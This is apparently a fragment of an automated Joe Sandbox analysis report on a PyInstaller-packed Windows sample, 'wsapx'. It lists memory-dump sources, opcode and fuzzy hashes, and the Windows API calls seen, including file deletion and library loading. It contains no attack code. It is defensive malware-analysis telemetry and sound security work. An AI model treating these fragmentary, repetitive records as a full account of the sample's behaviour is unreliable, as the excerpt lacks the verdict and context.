                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 485612231-0
                                                                                                                                                                                                                                                • Opcode ID: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
                                                                                                                                                                                                                                                • Instruction ID: bb80073ab4e34203d482b92d8b1f0b610e16cf64405409afa22fc5c342af9738
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D1E04F10E0820253FF167FF2788613896A06FD4F60F854034C91D822A1DE2C69878620
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,00007FF7C71CAA45,?,?,00000000,00007FF7C71CAAFA), ref: 00007FF7C71CAC36
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF7C71CAA45,?,?,00000000,00007FF7C71CAAFA), ref: 00007FF7C71CAC40
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 918212764-0
                                                                                                                                                                                                                                                • Opcode ID: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                                                                                                                                                                • Instruction ID: fcb1af7905ca4188874b991a65e92d67468ddf644b753bcdf3443fa653a7e908
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EE216211B2C64243EAA57FA5B49527D92D2AFC4FF0F884235DA2E477C1DE6CA4878324
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                • Opcode ID: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                                                                                                                                                                • Instruction ID: 205d2de5721195348593361f256ffe3bf771015d63912b837573ae568e498404
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3741D732A0820187FA34AF99B541279F3A4EB95FA0F940131DB8E87791CF2DE503CB61
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _fread_nolock
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 840049012-0
                                                                                                                                                                                                                                                • Opcode ID: e030e723ccfde11af85d0dda47479fa887e00b1a31505a58a3447353ba43a7bb
                                                                                                                                                                                                                                                • Instruction ID: fac5da0a37711a33efb0f7be2c34fcc64e4431d87ee4fa977ff3b5c943acd697
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e030e723ccfde11af85d0dda47479fa887e00b1a31505a58a3447353ba43a7bb
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CB217E61B1865287EB14BE6379043BAD691BF85FE8FC85430EE4D0B786CE7DE0428660
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                • Opcode ID: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
                                                                                                                                                                                                                                                • Instruction ID: fdfc1001f932569fa1f7ad15dc0e1ab766aca97bd891d72e38dd49d6acebaed0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0F318F21A1864287E7627FD5A84137CAA50ABC0FB4FC50135EA6D833D2CE7CE5438730
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                                • Instruction ID: 91115e2fd1bbbc9c0d303a93905b340650122a0185ad83e0113169f1e32c1d17
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 05116322A1C64183EA65BF91B40117EEAA8BFC5FA4FE44031EB4C57B96DF7DD4428720
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                • Opcode ID: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                                                                                                                                                                • Instruction ID: 4729124711d76494614b91328dfee41258d6470ea0af0efbe755ef49afc87248
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2721837261864187DB62AF18E480379B6A0EBE4FB4F944234EA9D876D5DF7CD4028F10
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                                • Instruction ID: f6c624080fd01c9890cb2498434e2ff58dc09a8d64f37a1bf1b7886543d957e0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF01C431A0874146EA04FF96AD0106AE695BFD5FF0F984631EE6C5BBD6DE3CE5028310
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7C71B9400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7C71B45E4,00000000,00007FF7C71B1985), ref: 00007FF7C71B9439
                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,00007FF7C71B6466,?,00007FF7C71B336E), ref: 00007FF7C71B9092
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ByteCharLibraryLoadMultiWide
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2592636585-0
                                                                                                                                                                                                                                                • Opcode ID: 7140f7c55cf735ced6a4f02887063d730e60c19ae08c919a697b9dfe54228ee6
                                                                                                                                                                                                                                                • Instruction ID: 265100930ba77ffbaddfe22055f7c55f63834d38d4a1de2d8193dc48d9bf1f31
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7140f7c55cf735ced6a4f02887063d730e60c19ae08c919a697b9dfe54228ee6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 30D0C211F2824542EA54BB6BBA466399661AFCDFD0FC8C035EE1D03B4ADC3CC0424B00
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(?,?,?,00007FF7C71C0D00,?,?,?,00007FF7C71C236A,?,?,?,?,?,00007FF7C71C3B59), ref: 00007FF7C71CD6AA
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AllocHeap
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 4292702814-0
                                                                                                                                                                                                                                                • Opcode ID: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
                                                                                                                                                                                                                                                • Instruction ID: 6fe09de0fc86655cb88ede0b83711b0c73477b4470f958b3ba79741fac8337df
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E2F03A10A1966657FE657FE17842274E2904FD4FB0F880230DD6E856C1DE2CA442D630
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                                                                                                                                                                • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                                                                                                                • API String ID: 3832162212-3165540532
                                                                                                                                                                                                                                                • Opcode ID: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
                                                                                                                                                                                                                                                • Instruction ID: 8708c9eeda6aeecd6e7cc5af4ea216f2604f4827efad2045f871fd21554d827b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 69D19432A08A4287EB21AF75F8942A9B761FBD4F68F804235DE5E43A94DF3CD146C750
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2669354495.00007FFD94741000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFD94740000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669319396.00007FFD94740000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669354495.00007FFD94899000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669354495.00007FFD9489B000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669354495.00007FFD948B0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669587652.00007FFD948B2000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669627059.00007FFD948B4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffd94740000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: 00007C0619
                                                                                                                                                                                                                                                • String ID: Bad ptr map entry key=%u expected=(%u,%u) got=(%u,%u)$Failed to read ptrmap key=%u$Freelist: $Page %u: never used$Page %u: pointer map referenced$incremental_vacuum enabled with a max rootpage of zero$max rootpage (%u) disagrees with header (%u)
                                                                                                                                                                                                                                                • API String ID: 3344901894-741541785
                                                                                                                                                                                                                                                • Opcode ID: b9356b5a1fbadadde7b26d0aebaef2e44b18eb42acd06dc5fd9ac9bfe1c0a29b
                                                                                                                                                                                                                                                • Instruction ID: cc8a526be6bdb834f1a46f28b38213eec66541d79b3fbf5139ca6d977ac8e8c4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b9356b5a1fbadadde7b26d0aebaef2e44b18eb42acd06dc5fd9ac9bfe1c0a29b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CC02B032B08B46CAE734CBA5D4A027D77A2FB86764F148136DA4D47B96DF39E441CB80
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2668800317.00007FFD94621000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FFD94620000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2668762753.00007FFD94620000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2668800317.00007FFD94682000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2668800317.00007FFD946CE000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2668800317.00007FFD946D2000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2668800317.00007FFD946D7000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2668800317.00007FFD9472F000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2668800317.00007FFD94734000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2668800317.00007FFD94737000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669246979.00007FFD94738000.00000080.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669284338.00007FFD9473A000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffd94620000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: 00007C0619ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 4003038724-0
                                                                                                                                                                                                                                                • Opcode ID: 14da1239b2aff37f2225a2b2eb9612ff8327347efab586c9ed8106aec9f5eecf
                                                                                                                                                                                                                                                • Instruction ID: 8bf6787fabff29c1b8ee5842bd09e3c8bbc0711935f6f7f1a9c6e125bcb24813
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 14da1239b2aff37f2225a2b2eb9612ff8327347efab586c9ed8106aec9f5eecf
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 043160B2709B8195EB748FA0E8A07ED3360FB85754F44803ADA5D87A95DF3CC588C710
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,00007FF7C71B8B09,00007FF7C71B3FA5), ref: 00007FF7C71B841B
                                                                                                                                                                                                                                                • RemoveDirectoryW.KERNEL32(?,00007FF7C71B8B09,00007FF7C71B3FA5), ref: 00007FF7C71B849E
                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(?,00007FF7C71B8B09,00007FF7C71B3FA5), ref: 00007FF7C71B84BD
                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(?,00007FF7C71B8B09,00007FF7C71B3FA5), ref: 00007FF7C71B84CB
                                                                                                                                                                                                                                                • FindClose.KERNEL32(?,00007FF7C71B8B09,00007FF7C71B3FA5), ref: 00007FF7C71B84DC
                                                                                                                                                                                                                                                • RemoveDirectoryW.KERNEL32(?,00007FF7C71B8B09,00007FF7C71B3FA5), ref: 00007FF7C71B84E5
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                                                • String ID: %s\*
                                                                                                                                                                                                                                                • API String ID: 1057558799-766152087
                                                                                                                                                                                                                                                • Opcode ID: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
                                                                                                                                                                                                                                                • Instruction ID: 03cd2494af196f309b8c586f0a0ecbf1177fb2e78981d939d22f52a89805784c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 69413071A0C54286EB20BF15F4886B9A3A1FBD4F64FC00636D99E42694DE3CD54B8B60
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
